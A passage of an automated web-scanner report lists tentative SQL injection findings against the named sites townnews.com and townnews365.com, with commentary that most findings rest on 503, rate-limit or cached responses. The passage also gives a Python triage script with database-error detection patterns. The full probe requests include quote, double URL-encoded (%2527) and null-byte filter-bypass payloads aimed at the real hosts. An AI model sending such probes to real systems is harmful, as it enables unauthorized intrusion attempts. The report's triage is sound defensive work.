<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

2.17. http://www.townnews.com/topic/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /topic/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request headers are not URL-decoded by the web server, so the %2527 in the User-Agent reaches the application as the literal characters "%2527"; the double-decoding bypass only applies if the application decodes header values twice. Also, Response 1 is the front end's HTTP/1.0 503 "Server Too Busy" and Response 2 is a 404 page, neither of which carries a database error, so the differential is unconfirmed.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /topic/ HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /topic/ HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 404 File Not Found
Server: WWW
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 22:47:30 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=4999
X-PHP-Engine: enabled
Connection: close
Real-Hostname: townnews.com
Content-Length: 24946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

2.18. http://www.townnews.com/users/admin/calendar/event/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /users/admin/calendar/event/

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Response 1 below is the front end's HTTP/1.0 503 "Server Too Busy" and Response 2 is the CMS's 404 "File Not Found" page; a 503/404 pair does not demonstrate that the double-encoded quote reached a query. Confirm with a re-test when the server is not overloaded.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /users/admin/calendar/event%2527/ HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /users/admin/calendar/event%2527%2527/ HTTP/1.1
Host: www.townnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 File Not Found
Server: WWW
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 22:48:03 GMT
X-TN-ServedBy: newsys.web.80
X-Loop: 1
Keep-Alive: timeout=300, max=4999
X-PHP-Engine: enabled
Connection: close
Real-Hostname: townnews.com
Content-Length: 24946

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

2.19. http://www.townnews365.com/advertising_solutions/dotconnect_media [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /advertising_solutions/dotconnect_media

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The evidence below does not support the "error message disappeared" step: Response 1 is an HTTP/1.0 503 "Server Too Busy" and Response 2 is a 417 "Rate limit exceeded for engine pages". Both are infrastructure responses (load shedding and rate limiting) that say nothing about how the application parsed the quote, so this finding should be re-tested at a lower request rate before it is counted.

Request 1

GET /advertising_solutions/dotconnect_media HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /advertising_solutions/dotconnect_media HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 417 Rate limit exceeded
Content-Type: text/html
Date: Sat, 14 May 2011 22:42:16 GMT
Connection: close
Content-Length: 40

417 Rate limit exceeded for engine pages
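In this finding neither response is the application's: the one-quote request drew the front end's 503 and the two-quote request drew a rate limiter's 417. The same HTTP/1.0 503 "Server Too Busy" is the "general error message" in every finding of this section, so anyone re-triaging the report needs to separate infrastructure responses from application responses before accepting a differential. The triage script below is an added example, not part of the report or of any scanner; its sample responses are constructed, three of them modelled on the 503, 417 and 404 responses shown on this page and the last a made-up MySQL error page of the kind that would actually support a SQL injection finding. The database-error signature list is illustrative, not exhaustive.

```python
"""Triage of the one-quote / two-quote differential against infrastructure noise.

Added example, not part of the report or of any scanner. The sample
responses are constructed: three are modelled on the 503, 417 and 404
responses shown on this page, one is a made-up MySQL error page.
"""
import re

# Illustrative, not exhaustive: strings a database or driver leaves in an
# error page. Their presence is what turns a "general error" into evidence.
DB_ERROR_SIGNATURES = re.compile(
    r"SQL syntax|SQLSTATE|ODBC|ORA-\d{5}|PG::|pg_query|mysql_|"
    r"Unclosed quotation mark|syntax error at or near",
    re.IGNORECASE,
)

# Constructed sample responses (CRLF-delimited, as on the wire).
BUSY_503 = ("HTTP/1.0 503 Server Too Busy\r\nContent-Length: 25\r\n"
            "Content-Type: text/html\r\n\r\n<h2>Server Too Busy</h2>")
RATE_417 = ("HTTP/1.1 417 Rate limit exceeded\r\nContent-Type: text/html\r\n"
            "Content-Length: 40\r\n\r\n417 Rate limit exceeded for engine pages")
NOT_FOUND_404 = ("HTTP/1.1 404 File Not Found\r\nServer: WWW\r\n"
                 "Content-Type: text/html\r\n\r\n<html><title>File Not Found</title></html>")
OK_200 = ("HTTP/1.1 200 OK\r\nServer: WWW\r\nContent-Type: text/html\r\n\r\n"
          "<html><title>Calendar</title></html>")
MYSQL_500 = ("HTTP/1.1 500 Internal Server Error\r\nServer: WWW\r\n"
             "Content-Type: text/html\r\n\r\n"
             "You have an error in your SQL syntax; check the manual for the "
             "right syntax to use near ''' at line 1")


def parse_response(raw: str):
    """Split a raw response into (http_version, status_code, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    version, code, _ = status_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return version, int(code), headers, body


def classify(raw: str) -> str:
    """Label one response: db-error, infrastructure, generic-error or normal."""
    version, code, headers, body = parse_response(raw)
    if DB_ERROR_SIGNATURES.search(body):
        return "db-error"
    # Load shedding and rate limiting are answered by the front end before
    # the application runs, so they say nothing about how the probe parsed.
    if code in (429, 502, 503, 504):
        return "infrastructure"
    if code == 417 and "rate limit" in body.lower():
        return "infrastructure"
    # The 503s on this page are HTTP/1.0, carry no Server header and a tiny
    # body: the fingerprint of a proxy-generated page rather than the CMS.
    if version == "HTTP/1.0" and "server" not in headers and len(body) < 64:
        return "infrastructure"
    if code >= 500:
        return "generic-error"
    return "normal"


def assess(one_quote: str, two_quotes: str) -> str:
    """Verdict for a probe pair, in the report's 'error, then no error' sense."""
    a, b = classify(one_quote), classify(two_quotes)
    if "infrastructure" in (a, b):
        return "retest"             # the differential was measured against noise
    if a == "db-error" and b != "db-error":
        return "likely-sqli"
    if a == "generic-error" and b == "normal":
        return "weak-differential"  # an error, but not identifiably a database one
    return "no-evidence"


if __name__ == "__main__":
    print("2.19 pair  :", assess(BUSY_503, RATE_417))
    print("503 vs 404 :", assess(BUSY_503, NOT_FOUND_404))
    print("real case  :", assess(MYSQL_500, OK_200))
```

Run over the pairs on this page, every finding comes back "retest": the first response is always classified as infrastructure, so no verdict about the application is possible until the probes are repeated against a server that is neither shedding load nor rate limiting the scanner.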

2.20. http://www.townnews365.com/classified_solutions/employment_solutions/employment_classifieds/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /classified_solutions/employment_solutions/employment_classifieds/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Response 1 is the front end's HTTP/1.0 503 "Server Too Busy"; Response 2 is a normal 200 page served from cache (X-Cache-Info: cached), which means the two-quote request may not have executed any application code at all. Treat this as unconfirmed pending a re-test that avoids the cache (for example with a varying query string) and yields an application-generated error.

Request 1

GET /classified_solutions/employment_solutions/employment_classifieds/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /classified_solutions/employment_solutions/employment_classifieds/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 4084848
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:42:42 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.7148
Accept-Ranges: bytes
X-PHP-Engine: enabled
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp1
Content-Length: 44642
Connection: close
X-Cache-Info: cached


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...

2.21. http://www.townnews365.com/classified_solutions/employment_solutions/the_job_network/demonstration/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /classified_solutions/employment_solutions/the_job_network/demonstration/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Response 1 is the front end's HTTP/1.0 503 "Server Too Busy" and Response 2 is the page's normal 301 redirect to the job network site; neither contains a database error. The differential therefore needs a re-test against a responsive server before it counts.

Request 1

GET /classified_solutions/employment_solutions/the_job_network/demonstration/?1'=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /classified_solutions/employment_solutions/the_job_network/demonstration/?1''=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 301 Moved Permanently
Server: WWW
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 2713224
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:43:40 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
Location: http://jobs.thejobnetwork.com/nphomepage.aspx?AffiliateId=3
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0774
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp16
Content-Length: 691

<!DOCTYPE html PUBLIC \"-//IETF//DTD HTML 2.0//EN\">
<html>
<head>
<base href="http://www.townnews365.com/content/tncms/live/" />

<title>301 Moved Permanently</title>
</head>
<body>
<script type='tex
...[SNIP]...

2.22. http://www.townnews365.com/classified_solutions/employment_solutions/top_jobs/demonstration [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /classified_solutions/employment_solutions/top_jobs/demonstration

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Headers are not URL-decoded by the web server, so the %00 in the Referer reaches the application as the literal characters "%00" unless the application decodes the header itself; the bypass claim rests on that decode. Response 1 is the front end's HTTP/1.0 503 "Server Too Busy" and Response 2 is a 200 served from cache (X-Cache-Info: cached); neither is an application-generated error, so the finding is unconfirmed.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /classified_solutions/employment_solutions/top_jobs/demonstration HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1 (redirected)

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /classified_solutions/employment_solutions/top_jobs/demonstration HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2 (redirected)

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 3645796
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:42:42 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.4444
Accept-Ranges: bytes
X-PHP-Engine: enabled
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp2
Content-Length: 36695
Connection: close
X-Cache-Info: cached


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...

2.23. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/login1.jpg [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content/tncms/live/global/resources/images/_images/login1.jpg

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Three caveats: the %00 in the User-Agent is not decoded by the web server and reaches the application as three literal characters unless the application decodes it; Response 1 is the front end's HTTP/1.0 503 "Server Too Busy"; and Response 2 is the JPEG itself served from cache (Content-Type: image/jpeg, X-Cache-Info: cached), a static file that is unlikely to involve a database query. This is better explained by load shedding than by SQL handling.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /content/tncms/live/global/resources/images/_images/login1.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24%00'
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content/tncms/live/global/resources/images/_images/login1.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24%00''
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 2

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=600
Content-Type: image/jpeg
Date: Sat, 14 May 2011 22:42:23 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "663542433"
Last-Modified: Wed, 08 Dec 2010 18:14:04 GMT
Real-Hostname: townnews365.com
Content-Length: 129874
Connection: Keep-Alive
X-Cache-Info: cached

......JFIF.....d.d......Ducky.......Z......Adobe.d...................................................................................................................................................X..
...[SNIP]...

2.24. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/login2.jpg [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content/tncms/live/global/resources/images/_images/login2.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /content/tncms/live/global%2527/resources/images/_images/login2.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content/tncms/live/global%2527%2527/resources/images/_images/login2.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:44:18 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
Real-Hostname: townnews365.com
Content-Length: 680
Connection: Keep-Alive
X-Cache-Info: cached

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.25. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/login2.jpg [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content/tncms/live/global/resources/images/_images/login2.jpg

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 8, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /content/tncms/live/global/resources/images/_images/login2.jpg%00' HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content/tncms/live/global/resources/images/_images/login2.jpg%00'' HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:44:51 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.26. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/login2.jpg [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content/tncms/live/global/resources/images/_images/login2.jpg

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /content/tncms/live/global/resources/images/_images/login2.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content/tncms/live/global/resources/images/_images/login2.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00''
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 2

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=600
Content-Type: image/jpeg
Date: Sat, 14 May 2011 22:42:23 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1931070189"
Last-Modified: Wed, 08 Dec 2010 18:14:04 GMT
Real-Hostname: townnews365.com
Content-Length: 80236
Connection: Keep-Alive
X-Cache-Info: cached

......JFIF.....d.d......Ducky.......Z......Adobe.d...................................................................................................................................................X..
...[SNIP]...

2.27. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/login2.jpg [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content/tncms/live/global/resources/images/_images/login2.jpg

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /content/tncms/live/global/resources/images/_images/login2.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751'; __utmb=121545751.3.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

